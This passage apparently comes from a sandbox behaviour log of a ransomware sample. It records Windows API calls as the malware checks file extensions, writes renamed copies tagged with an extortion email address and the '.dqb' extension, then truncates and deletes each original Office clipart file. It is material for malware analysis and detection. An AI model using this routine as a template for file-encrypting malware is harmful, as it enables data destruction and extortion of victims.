lpString2=".WMF") returned -1 [0059.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0059.041] lstrlenW (lpString=".jpg") returned 4 [0059.041] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.042] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.042] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0059.042] GetLastError () returned 0x0 [0059.042] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1e94, lpOverlapped=0x0) returned 1 [0059.173] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1ea0, lpOverlapped=0x0) returned 1 [0059.182] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.182] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.182] SetEndOfFile (hFile=0x1fc) returned 1 [0059.188] CloseHandle (hObject=0x1fc) returned 1 [0059.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.199] SetEndOfFile (hFile=0x158) returned 1 [0059.217] CloseHandle (hObject=0x158) returned 1 [0059.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf")) returned 1 [0059.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0059.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0059.230] lstrlenW (lpString=".doc") returned 4 [0059.230] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.230] lstrlenW (lpString=".docx") returned 5 [0059.230] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.230] lstrlenW (lpString=".pdf") returned 4 [0059.230] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.230] lstrlenW (lpString=".xls") returned 4 [0059.230] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.230] lstrlenW (lpString=".xlsx") returned 5 [0059.230] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.230] lstrlenW (lpString=".ppt") returned 4 [0059.230] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0059.230] lstrlenW (lpString=".zip") returned 4 [0059.230] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.230] lstrlenW (lpString=".rar") returned 4 [0059.230] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.230] lstrlenW (lpString=".bz2") returned 4 [0059.230] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.230] lstrlenW (lpString=".7z") returned 3 [0059.230] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0059.230] lstrlenW (lpString=".dbf") returned 4 [0059.230] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0059.230] lstrlenW (lpString=".1cd") returned 4 [0059.230] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0059.230] lstrlenW (lpString=".jpg") returned 4 [0059.230] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.233] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.233] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.233] GetLastError () returned 0x0 [0059.233] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xe04, lpOverlapped=0x0) returned 1 [0059.235] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xe10, lpOverlapped=0x0) returned 1 [0059.236] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.236] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.236] SetEndOfFile (hFile=0x180) returned 1 [0059.236] CloseHandle (hObject=0x180) returned 1 [0059.236] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.236] SetEndOfFile (hFile=0x158) returned 1 [0059.237] CloseHandle (hObject=0x158) returned 1 [0059.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.237] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf")) returned 1 [0059.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0059.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0059.237] lstrlenW (lpString=".doc") returned 4 [0059.237] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.237] lstrlenW (lpString=".docx") returned 5 [0059.237] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.237] lstrlenW (lpString=".pdf") returned 4 [0059.238] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.238] lstrlenW (lpString=".xls") returned 4 [0059.238] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.238] lstrlenW (lpString=".xlsx") returned 5 [0059.238] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.238] lstrlenW (lpString=".ppt") returned 4 [0059.238] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0059.238] lstrlenW (lpString=".zip") returned 4 [0059.238] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.238] lstrlenW (lpString=".rar") returned 4 [0059.238] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.238] lstrlenW (lpString=".bz2") returned 4 [0059.238] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.238] lstrlenW (lpString=".7z") returned 3 [0059.238] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0059.238] lstrlenW (lpString=".dbf") returned 4 [0059.238] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0059.238] lstrlenW (lpString=".1cd") returned 4 [0059.238] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 63 [0059.238] lstrlenW (lpString=".jpg") returned 4 [0059.238] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.238] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=2300) returned 1 [0059.238] CloseHandle (hObject=0x158) returned 1 [0059.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf")) returned 0x20 [0059.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0059.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0059.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.239] GetLastError () returned 0x0 [0059.239] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x8fc, lpOverlapped=0x0) returned 1 [0059.241] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x900, lpOverlapped=0x0) returned 1 [0059.242] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.242] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.242] SetEndOfFile (hFile=0x180) returned 1 [0059.242] CloseHandle (hObject=0x180) returned 1 [0059.242] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.242] SetEndOfFile (hFile=0x158) returned 1 [0059.243] CloseHandle (hObject=0x158) returned 1 [0059.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.243] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf")) returned 1 [0059.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0059.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0059.243] lstrlenW (lpString=".doc") returned 4 [0059.243] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.244] lstrlenW (lpString=".docx") returned 5 [0059.244] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.244] lstrlenW (lpString=".pdf") returned 4 [0059.244] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.244] lstrlenW (lpString=".xls") returned 4 [0059.244] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.244] lstrlenW (lpString=".xlsx") returned 5 [0059.244] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.244] lstrlenW (lpString=".ppt") returned 4 [0059.244] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0059.244] lstrlenW (lpString=".zip") returned 4 [0059.244] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.244] lstrlenW (lpString=".rar") returned 4 [0059.244] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.244] lstrlenW (lpString=".bz2") returned 4 [0059.244] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.244] lstrlenW (lpString=".7z") returned 3 [0059.244] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0059.244] lstrlenW (lpString=".dbf") returned 4 [0059.244] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0059.244] lstrlenW (lpString=".1cd") returned 4 [0059.244] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0059.244] lstrlenW (lpString=".jpg") returned 4 [0059.244] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.245] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.245] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.245] GetLastError () returned 0x0 [0059.245] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x8fc, lpOverlapped=0x0) returned 1 [0059.246] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x900, lpOverlapped=0x0) returned 1 [0059.247] ReadFile (in: hFile=0x158, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.247] WriteFile (in: hFile=0x180, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.247] SetEndOfFile (hFile=0x180) returned 1 [0059.248] CloseHandle (hObject=0x180) returned 1 [0059.248] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.248] SetEndOfFile (hFile=0x158) returned 1 [0059.249] CloseHandle (hObject=0x158) returned 1 [0059.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.249] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf")) returned 1 [0059.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0059.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0059.249] lstrlenW (lpString=".doc") returned 4 [0059.249] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.249] lstrlenW (lpString=".docx") returned 5 [0059.249] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.249] lstrlenW (lpString=".pdf") returned 4 [0059.249] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.249] lstrlenW (lpString=".xls") returned 4 [0059.249] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.249] lstrlenW (lpString=".xlsx") returned 5 [0059.249] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.249] lstrlenW (lpString=".ppt") returned 4 [0059.249] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.249] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0059.249] lstrlenW (lpString=".zip") returned 4 [0059.249] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.250] lstrlenW (lpString=".rar") returned 4 [0059.250] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.250] lstrlenW (lpString=".bz2") returned 4 [0059.250] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.250] lstrlenW (lpString=".7z") returned 3 [0059.250] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0059.250] lstrlenW (lpString=".dbf") returned 4 [0059.250] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0059.250] lstrlenW (lpString=".1cd") returned 4 [0059.250] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.250] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 63 [0059.250] lstrlenW (lpString=".jpg") returned 4 [0059.250] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.264] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.264] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0059.283] GetLastError () returned 0x0 [0059.283] ReadFile (in: hFile=0x15c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x820, lpOverlapped=0x0) returned 1 [0059.284] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x830, lpOverlapped=0x0) returned 1 [0059.285] ReadFile (in: hFile=0x15c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.285] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.285] SetEndOfFile (hFile=0x1e4) returned 1 [0059.286] CloseHandle (hObject=0x1e4) returned 1 [0059.286] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.286] SetEndOfFile (hFile=0x15c) returned 1 [0059.286] CloseHandle (hObject=0x15c) returned 1 [0059.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.287] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf")) returned 1 [0059.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0059.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0059.287] lstrlenW (lpString=".doc") returned 4 [0059.287] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.287] lstrlenW (lpString=".docx") returned 5 [0059.287] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.287] lstrlenW (lpString=".pdf") returned 4 [0059.287] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.287] lstrlenW (lpString=".xls") returned 4 [0059.287] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.287] lstrlenW (lpString=".xlsx") returned 5 [0059.287] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.287] lstrlenW (lpString=".ppt") returned 4 [0059.287] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0059.287] lstrlenW (lpString=".zip") returned 4 [0059.287] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.287] lstrlenW (lpString=".rar") returned 4 [0059.287] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.287] lstrlenW (lpString=".bz2") returned 4 [0059.287] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.287] lstrlenW (lpString=".7z") returned 3 [0059.287] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0059.288] lstrlenW (lpString=".dbf") returned 4 [0059.288] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0059.288] lstrlenW (lpString=".1cd") returned 4 [0059.288] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63 [0059.288] lstrlenW (lpString=".jpg") returned 4 [0059.288] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.288] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.288] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0059.288] GetLastError () returned 0x0 [0059.288] ReadFile (in: hFile=0x15c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x8b8, lpOverlapped=0x0) returned 1 